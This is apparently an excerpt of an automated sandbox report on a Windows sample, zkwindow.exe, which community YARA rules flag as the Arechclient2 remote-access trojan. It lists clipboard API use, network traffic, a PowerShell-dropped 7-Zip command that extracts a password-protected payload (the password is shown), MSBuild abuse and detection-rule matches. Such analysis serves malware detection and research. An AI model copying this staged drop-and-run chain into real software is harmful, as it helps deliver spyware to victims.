                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01624354 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,GlobalUnlock,SetClipboardData,GlobalUnlock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,11_2_01624354
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01624354 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,GlobalUnlock,SetClipboardData,GlobalUnlock,GlobalUnlock,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,11_2_01624354
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_016238EB OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GetClipboardData,GlobalLock,GlobalSize,MultiByteToWideChar,GlobalUnlock,CloseClipboard,11_2_016238EB
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01621D06 __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,IsChild,GetDlgCtrlID,SystemParametersInfoA,RegisterDragDrop,GetCursorPos,ScreenToClient,SystemParametersInfoA,ClientToScreen,IsWindowUnicode,WideCharToMultiByte,GetKeyState,GetKeyState,GetKeyState,GetCapture,SendMessageA,ImmGetContext,ImmNotifyIME,ImmReleaseContext,SetFocus,GetKeyState,GetMessageTime,GetMessageTime,DefWindowProcA,MsgWaitForMultipleObjects,GetTickCount,PostMessageA,SetFocus,11_2_01621D06
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01621D06 __ehhandler$?_Init@?$numpunct@G@std@@IAEXABV_Locinfo@2@_N@Z,__EH_prolog3_catch_GS,IsChild,GetDlgCtrlID,SystemParametersInfoA,RegisterDragDrop,GetCursorPos,ScreenToClient,SystemParametersInfoA,ClientToScreen,IsWindowUnicode,WideCharToMultiByte,GetKeyState,GetKeyState,GetKeyState,GetCapture,SendMessageA,ImmGetContext,ImmNotifyIME,ImmReleaseContext,SetFocus,GetKeyState,GetMessageTime,GetMessageTime,DefWindowProcA,MsgWaitForMultipleObjects,GetTickCount,PostMessageA,SetFocus,11_2_01621D06

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                            Drops password protected ZIP file
                            Source: fe387de893ce4f2ca49f16029d364dc1.1.drZip Entry: encrypted
                            Source: fe387de893ce4f2ca49f16029d364dc1.1.drZip Entry: encrypted
                            Source: fe387de893ce4f2ca49f16029d364dc1.1.drZip Entry: encrypted
                            Source: fe387de893ce4f2ca49f16029d364dc1.1.drZip Entry: encrypted
                            Source: fe387de893ce4f2ca49f16029d364dc1.1.drZip Entry: encrypted
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\7zip\7za.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008EAB10: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,9_2_008EAB10
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013C8B500_2_00007FF7013C8B50
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D24D80_2_00007FF7013D24D8
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D44C40_2_00007FF7013D44C4
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D46480_2_00007FF7013D4648
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8F53F81_2_00007FFC3D8F53F8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0093A3069_2_0093A306
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008E86249_2_008E8624
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0092086B9_2_0092086B
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0090EC389_2_0090EC38
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008F91BC9_2_008F91BC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009111AC9_2_009111AC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0091F2B59_2_0091F2B5
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009997809_2_00999780
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0097BAF49_2_0097BAF4
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00911F389_2_00911F38
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009720789_2_00972078
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009AA0609_2_009AA060
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009621AC9_2_009621AC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009021AC9_2_009021AC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009A41C09_2_009A41C0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BE3609_2_009BE360
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C84B09_2_009C84B0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BA4509_2_009BA450
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0097444C9_2_0097444C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0095A47C9_2_0095A47C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0094E5089_2_0094E508
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009365299_2_00936529
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BC5209_2_009BC520
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B26D09_2_009B26D0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009926F09_2_009926F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0096C6009_2_0096C600
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C87109_2_009C8710
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C87409_2_009C8740
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B07709_2_009B0770
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C88909_2_009C8890
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C88A09_2_009C88A0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0098A8FC9_2_0098A8FC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0090880C9_2_0090880C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009408089_2_00940808
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C69009_2_009C6900
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009A09409_2_009A0940
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00902AE89_2_00902AE8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B4AE09_2_009B4AE0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008E8B989_2_008E8B98
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00956D209_2_00956D20
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00930D609_2_00930D60
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009AAE909_2_009AAE90
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0096EEFC9_2_0096EEFC
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00986E189_2_00986E18
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B4E409_2_009B4E40
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0096AF4C9_2_0096AF4C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BCF709_2_009BCF70
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0094108C9_2_0094108C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C50109_2_009C5010
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009A10209_2_009A1020
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009AB0209_2_009AB020
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009971E09_2_009971E0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008ED1089_2_008ED108
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0090710C9_2_0090710C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0094D1249_2_0094D124
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009351489_2_00935148
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009952A09_2_009952A0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009572D89_2_009572D8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B92E09_2_009B92E0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008F72009_2_008F7200
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009CB2309_2_009CB230
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009693B09_2_009693B0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C53F09_2_009C53F0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009733649_2_00973364
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B54809_2_009B5480
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009054E89_2_009054E8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0098740C9_2_0098740C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B75809_2_009B7580
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009415B89_2_009415B8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009195449_2_00919544
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0097F5789_2_0097F578
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0095D6A89_2_0095D6A8
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C76509_2_009C7650
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BD6409_2_009BD640
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009897C49_2_009897C4
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C78709_2_009C7870
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0094599C9_2_0094599C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009BB9909_2_009BB990
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0094B9C09_2_0094B9C0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C59009_2_009C5900
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00915A5C9_2_00915A5C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C1A609_2_009C1A60
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009A9BB09_2_009A9BB0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00917C949_2_00917C94
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00927C649_2_00927C64
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009A3DD09_2_009A3DD0
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009B9D309_2_009B9D30
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00929D509_2_00929D50
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00921E3C9_2_00921E3C
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C7E509_2_009C7E50
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00951E649_2_00951E64
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00901F009_2_00901F00
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_00995F509_2_00995F50
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D160E411_2_00D160E4
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CF44C011_2_00CF44C0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D165B811_2_00D165B8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1884011_2_00D18840
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D18BA811_2_00D18BA8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D68C7C11_2_00D68C7C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1EE2C11_2_00D1EE2C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D18FC011_2_00D18FC0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C70F1811_2_00C70F18
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1D14011_2_00D1D140
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D172C011_2_00D172C0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D0D20011_2_00D0D200
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D4534C11_2_00D4534C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4F48C11_2_00C4F48C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1569411_2_00D15694
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1D8C811_2_00D1D8C8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D698A011_2_00D698A0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D119E811_2_00D119E8
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1594811_2_00D15948
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D1BA5411_2_00D1BA54
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C49CF411_2_00C49CF4
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D11E0011_2_00D11E00
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D19F2C11_2_00D19F2C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162A11411_2_0162A114
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162A53411_2_0162A534
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01621D0611_2_01621D06
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0161C6E911_2_0161C6E9
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162B1C011_2_0162B1C0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0163121811_2_01631218
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162946111_2_01629461
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162D7EA11_2_0162D7EA
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162993411_2_01629934
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162BA9011_2_0162BA90
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_0162FD3411_2_0162FD34
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01621D0611_2_01621D06
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_01629D0811_2_01629D08
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zip\7za.exe FBB3DADCC29BCBC5460484D858C5F33F99E5317F5F6CD8D9C83F4DD8C39B3E30
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: String function: 00007FF7013C88B0 appears 35 times
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: String function: 00007FF7013CBDF8 appears 51 times
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: String function: 00007FF7013CBB7C appears 126 times
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: String function: 008E2448 appears 55 times
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: String function: 008E4184 appears 52 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D26958 appears 70 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D522E0 appears 38 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 0162BA34 appears 37 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 01633195 appears 80 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D26A88 appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D3F428 appears 93 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00C5D308 appears 64 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D2608C appears 126 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D28FC0 appears 507 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D52284 appears 69 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D28EC4 appears 117 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D261A8 appears 92 times
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: String function: 00D0E464 appears 67 times
                            Source: zkwindow.exe, 00000000.00000000.1236744170.00007FF7013FC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename: vs zkwindow.exe
                            Source: zkwindow.exeBinary or memory string: OriginalFilename: vs zkwindow.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: Commandline size = 6070
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: Commandline size = 6070Jump to behavior
                            Source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/28@3/3
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008FA960 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,9_2_008FA960
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008ECB18 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_008ECB18
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_008ECA6C GetDiskFreeSpaceExW,GetDiskFreeSpaceW,9_2_008ECA6C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4EB6E FreeResource,11_2_00C4EB6E
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\5c8947d1385c4e608aa7a0853c65418d
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
                            Source: C:\Users\user\Desktop\zkwindow.exeMutant created: \Sessions\1\BaseNamedObjects\executable soft
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ltawufd.hkp.ps1Jump to behavior
                            Source: zkwindow.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: zkwindow.exeVirustotal: Detection: 18%
